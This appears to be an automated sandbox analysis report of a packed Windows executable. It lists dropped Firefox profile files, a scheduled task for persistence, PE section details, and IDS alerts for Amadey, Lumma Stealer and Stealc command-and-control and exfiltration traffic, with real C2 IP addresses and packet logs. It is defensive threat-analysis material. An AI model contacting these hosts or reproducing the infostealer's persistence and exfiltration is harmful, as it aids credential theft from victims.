SHA1:	BA90BDEB1DF636239A27E9D9EAFDF832984188B4
SHA-256:	BB07B979F9A8933932BDBDAFACCE41DCCF5628102135F1B2EE5238C638D75896
SHA-512:	5C7C630D199D2E1D74D69946428BB4EBC77821530B4260EDA91D32EE63CB3AF8011819F2ABE3D682E9339E238A1D7AC1C22CCDADCDC136146D8CC3FD7009ECD2
Malicious:	false
Preview:	7....-.............V({..,G...fL............V({..o..G5pI................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	11974
Entropy (8bit):	5.491817387652442
Encrypted:	false
SSDEEP:	192:9naRtLYbBp6Ahj4qyaaX86KlNvh5RfGNBw8dYSl:geqquOtcwL0
MD5:	DBC1B6B6102FB2A1D26F8D4F36C26059
SHA1:	D8ED90E9072EDA3A9E1BD3B490E68C584513A5C9
SHA-256:	0C1FC8815AEFE0076E4AFF54346AA32DC8BD01E1AEB272A78C7F6F64CCF59F5A
SHA-512:	867AF3BF34875BBEAAB6F63DFB7E86BD398033F264C0DD68AB8493031D5CBE77D05D8FE0E35B1AA9F1E41A69CEC0E9C161BD90FCF42D5DB198300098ADCC8D94
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1732941550);..user_pref("app.up

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	11974
Entropy (8bit):	5.491817387652442
Encrypted:	false
SSDEEP:	192:9naRtLYbBp6Ahj4qyaaX86KlNvh5RfGNBw8dYSl:geqquOtcwL0
MD5:	DBC1B6B6102FB2A1D26F8D4F36C26059
SHA1:	D8ED90E9072EDA3A9E1BD3B490E68C584513A5C9
SHA-256:	0C1FC8815AEFE0076E4AFF54346AA32DC8BD01E1AEB272A78C7F6F64CCF59F5A
SHA-512:	867AF3BF34875BBEAAB6F63DFB7E86BD398033F264C0DD68AB8493031D5CBE77D05D8FE0E35B1AA9F1E41A69CEC0E9C161BD90FCF42D5DB198300098ADCC8D94
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1732941550);..user_pref("app.up

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 1, last written using SQLite version 3042000, page size 32768, file counter 5, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.04062825861060003
Encrypted:	false
SSDEEP:	6:ltBl/l4/WN1h4BEJYqWvLue3FMOrMZ0l:DBl/WuntfJiFxMZO
MD5:	18F65713B07CB441E6A98655B726D098
SHA1:	2CEFA32BC26B25BE81C411B60C9925CB0F1F8F88
SHA-256:	B6C268E48546B113551A5AF9CA86BB6A462A512DE6C9289315E125CEB0FD8621
SHA-512:	A6871076C7D7ED53B630F9F144ED04303AD54A2E60B94ECA2AA96964D1AB375EEFDCA86CE0D3EB0E9DBB81470C6BD159877125A080C95EB17E54A52427F805FB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......x..x..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 131075, last written using SQLite version 3042000, page size 512, file counter 6, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.0836444556178684
Encrypted:	false
SSDEEP:	24:JBwdh/cEUcR9PzNFPFHx/GJRBdkOrDcRB1trwDeAq2gRMyxr3:jnEUo9LXtR+JdkOnohYsl
MD5:	8B40B1534FF0F4B533AF767EB5639A05
SHA1:	63EDB539EA39AD09D701A36B535C4C087AE08CC9
SHA-256:	AF275A19A5C2C682139266065D90C237282274D11C5619A121B7BDBDB252861B
SHA-512:	54AF707698CED33C206B1B193DA414D630901762E88E37E99885A50D4D5F8DDC28367C9B401DFE251CF0552B4FA446EE28F78A97C9096AFB0F2898BFBB673B53
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	5.033312689034004
Encrypted:	false
SSDEEP:	48:YrSAYvc86UQZpExB1+anOsW4Vh351VxWRzzc8eYMsku7f86SLAVL7if5FtsfAcb5:ycByTEr5QFRzzcMvbw6KkCrrc2Rn27
MD5:	E1925777E9372DFBCB532BEC0CDD042F
SHA1:	CE4724C3560F26D85908F984B344829860E9D569
SHA-256:	C2DC950BAC509C5E8EE8D6F64EFD050C68BC145F193CAC9AF83F204684069D9C
SHA-512:	9C729D92C92C85B58DCE2DC02A608611E8D4B77F0F7F2E37F0319D73AC83035A8288EAD621BF452F3C5008BC097FB44DD8822FB1E541034ECC711CA8496C8CCA
Malicious:	false
Preview:	{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2024-11-30T04:39:24.223Z","profileAgeCreated":1696333826043,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	5.033312689034004
Encrypted:	false
SSDEEP:	48:YrSAYvc86UQZpExB1+anOsW4Vh351VxWRzzc8eYMsku7f86SLAVL7if5FtsfAcb5:ycByTEr5QFRzzcMvbw6KkCrrc2Rn27
MD5:	E1925777E9372DFBCB532BEC0CDD042F
SHA1:	CE4724C3560F26D85908F984B344829860E9D569
SHA-256:	C2DC950BAC509C5E8EE8D6F64EFD050C68BC145F193CAC9AF83F204684069D9C
SHA-512:	9C729D92C92C85B58DCE2DC02A608611E8D4B77F0F7F2E37F0319D73AC83035A8288EAD621BF452F3C5008BC097FB44DD8822FB1E541034ECC711CA8496C8CCA
Malicious:	false
Preview:	{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2024-11-30T04:39:24.223Z","profileAgeCreated":1696333826043,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.4136171436422336
Encrypted:	false
SSDEEP:	6:nV5YvXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBHt0:EPf2RKQ1CGAFAjzvYRQVBHt0
MD5:	428FDBC97159A9B4DC0CD2B34382AB93
SHA1:	779E513041CFC9CA47DA186D58D3A66C345D2971
SHA-256:	3831F0A7DB82203740D2318E68DD98AA3C622A4C9811BB5BAF374084E986A123
SHA-512:	D2476AED69FA7C0BEF5D8BF1045577E6998D876276259F84075A4961492F93D2A34F5F247B8F14F67B2C1113E7DDB606DBD6484152FA3DA83DAEABE1D09E5190
Malicious:	false
Preview:	.........S.A...X.T?LF.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94980674543301
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'930'752 bytes
MD5:	27a3277f6daec8e2369a88cea407fb46
SHA1:	c7da43b9bc1a51aa28cda592d8266e17057ab6b7
SHA256:	ba82209b941924aeb6196fac31a5e2d13193f49be26163683bf29a293b3fcec0
SHA512:	089b550d03e9f30d5be540830aca38519fb0b839ee9dee852c86111969e12c6a0c36d821b5a2d519c7c23bf73a598a3963c01fa3df93322c1bf6e39be4f8116b
SSDEEP:	49152:ea7wlm3OM01MszDNdEmzJgLZJXPLvTtY3MJnFpY:em5WXNd9zWL3XPLb2Md
TLSH:	B6953392F8F38EB9DCABCEF4087542E6197F28DE66C8461661D7B156AC73E1941030BC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8c6000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB7D47BABAAh
andps xmm3, dqword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x344	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c49e8	0x10	egarwnqv
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c4998	0x18	egarwnqv
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	c2d2f53c621fa3f7420e320bd5876858	False	0.9978499659400545	data	7.980771158039659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x344	0x400	982623c07c43a8169da5c3bd55ce4d06	False	0.4345703125	data	5.395849414192414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b4000	0x200	badb8636eb2c05c263dc26f488545203	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
egarwnqv	0x31f000	0x1a6000	0x1a5a00	15743148f8d7438b8e4493514fd5d3b9	False	0.99483142788319	data	7.954289252151083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kktuolht	0x4c5000	0x1000	0x400	f07ace98ec0da2a4322c3ba52d850f33	False	0.73046875	data	5.783617001853085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c6000	0x3000	0x2200	cb6bb6efbed8e20a35f59daf7c79d999	False	0.05675551470588235	DOS executable (COM)	0.6717445236605883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x152	ASCII text, with CRLF line terminators			0.6479289940828402
RT_MANIFEST	0x691c4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-30T04:06:05.447692+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49753	185.215.113.43	80	TCP
2024-11-30T04:06:09.904046+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49765	31.41.244.11	80	TCP
2024-11-30T04:06:14.776447+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49759	TCP
2024-11-30T04:06:16.203948+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49780	185.215.113.43	80	TCP
2024-11-30T04:06:17.754931+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49782	185.215.113.16	80	TCP
2024-11-30T04:06:24.859421+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49797	104.21.16.9	443	TCP
2024-11-30T04:06:25.100048+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49798	185.215.113.43	80	TCP
2024-11-30T04:06:25.684942+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49797	104.21.16.9	443	TCP
2024-11-30T04:06:25.684942+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49797	104.21.16.9	443	TCP
2024-11-30T04:06:26.611235+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49800	185.215.113.16	80	TCP
2024-11-30T04:06:27.032683+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49803	104.21.16.9	443	TCP
2024-11-30T04:06:27.849102+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49803	104.21.16.9	443	TCP
2024-11-30T04:06:27.849102+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49803	104.21.16.9	443	TCP
2024-11-30T04:06:29.484704+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49810	104.21.16.9	443	TCP
2024-11-30T04:06:32.319859+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49815	104.21.16.9	443	TCP
2024-11-30T04:06:33.224907+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49816	185.215.113.206	80	TCP
2024-11-30T04:06:33.520392+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49815	104.21.16.9	443	TCP
2024-11-30T04:06:33.598920+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49818	185.215.113.43	80	TCP
2024-11-30T04:06:35.109143+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49822	185.215.113.16	80	TCP
2024-11-30T04:06:35.144899+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49823	104.21.16.9	443	TCP
2024-11-30T04:06:37.710613+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49828	104.21.16.9	443	TCP
2024-11-30T04:06:40.313541+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49836	104.21.16.9	443	TCP
2024-11-30T04:06:40.347872+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49836	104.21.16.9	443	TCP
2024-11-30T04:06:40.788127+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49839	185.215.113.43	80	TCP
2024-11-30T04:06:42.311733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49840	185.215.113.16	80	TCP
2024-11-30T04:06:50.299338+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49877	104.21.16.9	443	TCP
2024-11-30T04:06:50.884742+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49879	185.215.113.43	80	TCP
2024-11-30T04:06:51.504070+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49877	104.21.16.9	443	TCP
2024-11-30T04:06:52.347504+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49892	31.41.244.11	80	TCP
2024-11-30T04:06:53.021084+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49894	185.215.113.16	80	TCP
2024-11-30T04:07:03.724639+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49919	185.215.113.43	80	TCP
2024-11-30T04:07:05.303329+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49924	31.41.244.11	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2024 04:06:03.949803114 CET	49753	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:04.069994926 CET	80	49753	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:04.070533991 CET	49753	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:04.070736885 CET	49753	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:04.190712929 CET	80	49753	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:05.447624922 CET	80	49753	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:05.447691917 CET	49753	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:06.952867985 CET	49753	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:06.953191996 CET	49759	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:07.073079109 CET	80	49753	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:07.073126078 CET	80	49759	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:07.073158979 CET	49753	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:07.073240995 CET	49759	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:07.073515892 CET	49759	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:07.193413019 CET	80	49759	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:08.441818953 CET	80	49759	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:08.442014933 CET	49759	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:08.445528984 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:08.565586090 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:08.565696001 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:08.565838099 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:08.685687065 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.903964043 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.903995037 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904007912 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904046059 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904081106 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904112101 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904149055 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904179096 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904190063 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904216051 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904227972 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904630899 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904640913 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904671907 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904683113 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904814959 CET	80	49765	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:09.904858112 CET	49765	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:09.904932976 CET	80	49765	31.41.244.11	192.168.2.4
